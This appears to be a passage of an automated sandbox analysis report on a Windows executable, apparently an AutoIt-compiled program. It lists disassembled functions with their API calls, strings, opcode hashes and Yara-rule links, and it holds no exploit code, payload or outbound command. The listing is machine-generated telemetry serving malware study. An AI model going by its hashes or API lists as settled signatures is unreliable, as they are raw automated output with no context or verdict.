                                                                                                                              • Instruction Fuzzy Hash: 6A616FB2504345AFC710EF64C845EAEB7E9FF99310F04891EF98987251EB31EA45CB92
                                                                                                                              Function 001BDAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 001BDB26
                                                                                                                              • GetDriveTypeW.KERNEL32 ref: 001BDB73
                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001BDBBB
                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001BDBF2
                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001BDC20
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                              • API String ID: 2698844021-4113822522
                                                                                                                              • Opcode ID: c96ee8f780e0a1d05d0bd5b8eb39af3c6a9b7a7308fb04857b9c90fba4a2b38f
                                                                                                                              • Instruction ID: 1fa85f4b3097fcc2a15f701b47ba46614a21c8d177bec2f7a314f97084c8e3cd
                                                                                                                              • Opcode Fuzzy Hash: c96ee8f780e0a1d05d0bd5b8eb39af3c6a9b7a7308fb04857b9c90fba4a2b38f
                                                                                                                              • Instruction Fuzzy Hash: 5B515B71104305AFC704EF10D98196AB7F9EFA9718F10886CF89A972A1EB71EE05CF52
                                                                                                                              Function 001B3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001E4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 001B3145
                                                                                                                              • LoadStringW.USER32(00000000,?,001E4085,00000016), ref: 001B314E
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,001E4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 001B3170
                                                                                                                              • LoadStringW.USER32(00000000,?,001E4085,00000016), ref: 001B3173
                                                                                                                              • __swprintf.LIBCMT ref: 001B31B3
                                                                                                                              • __swprintf.LIBCMT ref: 001B31C5
                                                                                                                              • _wprintf.LIBCMT ref: 001B326C
                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001B3283
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                              • API String ID: 984253442-2268648507
                                                                                                                              • Opcode ID: 3e875b5aad245c732420877fc42634d4d16289ad94520532aaeb4846f389b81b
                                                                                                                              • Instruction ID: 108a1dd89027f1f36ef618dc56cf95fe33d9637e676406614cda6e18e6f6e409
                                                                                                                              • Opcode Fuzzy Hash: 3e875b5aad245c732420877fc42634d4d16289ad94520532aaeb4846f389b81b
                                                                                                                              • Instruction Fuzzy Hash: 60415372940219BACB14FBD0DD87EEEB77DAF28701F104065F205B20A2EB756F54CAA0
                                                                                                                              Function 001BD950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 001BD96C
                                                                                                                              • __swprintf.LIBCMT ref: 001BD98E
                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 001BD9CB
                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 001BD9F0
                                                                                                                              • _memset.LIBCMT ref: 001BDA0F
                                                                                                                              • _wcsncpy.LIBCMT ref: 001BDA4B
                                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 001BDA80
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001BDA8B
                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 001BDA94
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001BDA9E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                              • String ID: :$\$\??\%s
                                                                                                                              • API String ID: 2733774712-3457252023
                                                                                                                              • Opcode ID: 31846e78bdd7b19a5dc4196b1e58c1c850c3bf040438dcb0be5e809002530cb0
                                                                                                                              • Instruction ID: 622de0a80490b8049c854dd05bc0469704a405eb2cca4caf3c810a53d830afc6
                                                                                                                              • Opcode Fuzzy Hash: 31846e78bdd7b19a5dc4196b1e58c1c850c3bf040438dcb0be5e809002530cb0
                                                                                                                              • Instruction Fuzzy Hash: 0A31A676600209AADF20DFA4EC49FEE77BDBF84704F1481A5F519D2061E7709A81CBA1
                                                                                                                              Function 001DE541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,001DBD04,?,?), ref: 001DE564
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,001DBD04,?,?,00000000,?), ref: 001DE57B
                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,001DBD04,?,?,00000000,?), ref: 001DE586
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,001DBD04,?,?,00000000,?), ref: 001DE593
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 001DE59C
                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,001DBD04,?,?,00000000,?), ref: 001DE5AB
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 001DE5B4
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,001DBD04,?,?,00000000,?), ref: 001DE5BB
                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001DE5CC
                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,001FD9BC,?), ref: 001DE5E5
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 001DE5F5
                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 001DE619
                                                                                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 001DE644
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 001DE66C
                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001DE682
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3840717409-0
                                                                                                                              • Opcode ID: 0d78eb0f216bcf7c0ff6bed45cafd1bd31adae8adbb370c9ba9dd027e30ee9f4
                                                                                                                              • Instruction ID: 2fa79c4960512c42823fbca2747e87e0a8e5a9af243c94f2a3faba5286f28e52
                                                                                                                              • Opcode Fuzzy Hash: 0d78eb0f216bcf7c0ff6bed45cafd1bd31adae8adbb370c9ba9dd027e30ee9f4
                                                                                                                              • Instruction Fuzzy Hash: BB413B75600204BFDB11AF65EC88EBE7BBAEF89716F108059F905DB260D7319D41DB60
                                                                                                                              Function 001C0B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __wsplitpath.LIBCMT ref: 001C0C93
                                                                                                                              • _wcscat.LIBCMT ref: 001C0CAB
                                                                                                                              • _wcscat.LIBCMT ref: 001C0CBD
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 001C0CD2
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 001C0CE6
                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 001C0CFE
                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 001C0D18
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 001C0D2A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 34673085-438819550
                                                                                                                              • Opcode ID: 4f81ea299b3d15f1b68a2f7e1a3e631f8888eee8a840fdc43af588797f310e18
                                                                                                                              • Instruction ID: f0ab33331d1c4eae0e1085a4d4b20fe5e83b7fd74579aba01d4761b3e362f89f
                                                                                                                              • Opcode Fuzzy Hash: 4f81ea299b3d15f1b68a2f7e1a3e631f8888eee8a840fdc43af588797f310e18
                                                                                                                              • Instruction Fuzzy Hash: A2819F71504205DFCB25DF64C844FAAB7E8ABA9314F14896EE88AC7251E734ED84CB92
                                                                                                                              Function 001AB593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001AB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 001AB903
                                                                                                                                • Part of subcall function 001AB8E7: GetLastError.KERNEL32(?,001AB3CB,?,?,?), ref: 001AB90D
                                                                                                                                • Part of subcall function 001AB8E7: GetProcessHeap.KERNEL32(00000008,?,?,001AB3CB,?,?,?), ref: 001AB91C
                                                                                                                                • Part of subcall function 001AB8E7: RtlAllocateHeap.NTDLL(00000000,?,001AB3CB), ref: 001AB923
                                                                                                                                • Part of subcall function 001AB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 001AB93A
                                                                                                                                • Part of subcall function 001AB982: GetProcessHeap.KERNEL32(00000008,001AB3E1,00000000,00000000,?,001AB3E1,?), ref: 001AB98E
                                                                                                                                • Part of subcall function 001AB982: RtlAllocateHeap.NTDLL(00000000,?,001AB3E1), ref: 001AB995
                                                                                                                                • Part of subcall function 001AB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,001AB3E1,?), ref: 001AB9A6
                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001AB5F7
                                                                                                                              • _memset.LIBCMT ref: 001AB60C
                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001AB62B
                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 001AB63C
                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 001AB679
                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001AB695
                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 001AB6B2
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001AB6C1
                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 001AB6C8
                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001AB6E9
                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 001AB6F0
                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001AB721
                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001AB747
                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001AB75B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2347767575-0
                                                                                                                              • Opcode ID: 03a5028122cee031c337acdf71966c6c457364c5efcca8375debb0a1527e78af
                                                                                                                              • Instruction ID: 10cf87dc0aa0eacd53e26a73dff15ed8a64b7fe0646dc0f766e2993bf0225e84
                                                                                                                              • Opcode Fuzzy Hash: 03a5028122cee031c337acdf71966c6c457364c5efcca8375debb0a1527e78af
                                                                                                                              • Instruction Fuzzy Hash: AF517A79900249AFCF009FA4DC85EFEBB7AFF45304F048129F915A7292DB749A45CB60
                                                                                                                              Function 001CA268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetDC.USER32(00000000), ref: 001CA2DD
                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 001CA2E9
                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 001CA2F5
                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 001CA302
                                                                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 001CA356
                                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 001CA392
                                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 001CA3B6
                                                                                                                              • SelectObject.GDI32(00000006,?), ref: 001CA3BE
                                                                                                                              • DeleteObject.GDI32(?), ref: 001CA3C7
                                                                                                                              • DeleteDC.GDI32(00000006), ref: 001CA3CE
                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 001CA3D9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                              • String ID: (
                                                                                                                              • API String ID: 2598888154-3887548279
                                                                                                                              • Opcode ID: 7580cac174b88beec6a8c8c7affe809e0c9246fd657daa78563559f1169c27e0
                                                                                                                              • Instruction ID: 544553a91112ec7c10b0666202d09681f71c5a27984c09361fb24eb168ba558e
                                                                                                                              • Opcode Fuzzy Hash: 7580cac174b88beec6a8c8c7affe809e0c9246fd657daa78563559f1169c27e0
                                                                                                                              • Instruction Fuzzy Hash: CB513771A00209AFCB15CFA8D888EAEBBB9FF48310F14851DF99AA7210C731A841CB50
                                                                                                                              Function 001D3AF7 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,001D2AA6,?,?), ref: 001D3B0E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpper
                                                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E"
                                                                                                                              • API String ID: 3964851224-51274421
                                                                                                                              • Opcode ID: 6b9680ce382adc0c0204abf073055cb9f7d6f393d5d5984e8702a56c83388b5f
                                                                                                                              • Instruction ID: 7a34112fef1ea13a6c11e18de5d201c5fd164f51d0765201ebcb85d05c595763
                                                                                                                              • Opcode Fuzzy Hash: 6b9680ce382adc0c0204abf073055cb9f7d6f393d5d5984e8702a56c83388b5f
                                                                                                                              • Instruction Fuzzy Hash: 7841903413024A9BDF04FF54E840BEA3365AF26350F54482AFCA15B395DB70AF6ACB52
                                                                                                                              Function 001B32B0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 72windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001E3C64,00000010,00000000,Bad directive syntax error,0020DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 001B32D1
                                                                                                                              • LoadStringW.USER32(00000000,?,001E3C64,00000010), ref: 001B32D8
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • _wprintf.LIBCMT ref: 001B3309
                                                                                                                              • __swprintf.LIBCMT ref: 001B332B
                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001B3395
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"#
                                                                                                                              • API String ID: 1506413516-826845855
                                                                                                                              • Opcode ID: 5dee89bdb42bf74d79daf03e07a2b44d7045180eeddd31e92e56c9e58e03548f
                                                                                                                              • Instruction ID: 20a696630b0c2c6d7d71fc3eebc89a528ebab5c7047e21bfe04ac0d3cd07b482
                                                                                                                              • Opcode Fuzzy Hash: 5dee89bdb42bf74d79daf03e07a2b44d7045180eeddd31e92e56c9e58e03548f
                                                                                                                              • Instruction Fuzzy Hash: 2B213D32850219BBCF11EFD0DC46EEE7775BF28704F008455F519A10A2EB75AB64DBA1
                                                                                                                              Function 001BD520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadStringW.USER32(00000066,?,00000FFF), ref: 001BD567
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 001BD589
                                                                                                                              • __swprintf.LIBCMT ref: 001BD5DC
                                                                                                                              • _wprintf.LIBCMT ref: 001BD68D
                                                                                                                              • _wprintf.LIBCMT ref: 001BD6AB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                              • API String ID: 2116804098-2391861430
                                                                                                                              • Opcode ID: 19213b01f4788375c24d2d6e6e8f5325e9ccda990eb1f5c5be49d4d1404068ab
                                                                                                                              • Instruction ID: b587ca56ff15e99fcf1794c7e8674d47839ba59b718edd76926f47aa9fe8f19d
                                                                                                                              • Opcode Fuzzy Hash: 19213b01f4788375c24d2d6e6e8f5325e9ccda990eb1f5c5be49d4d1404068ab
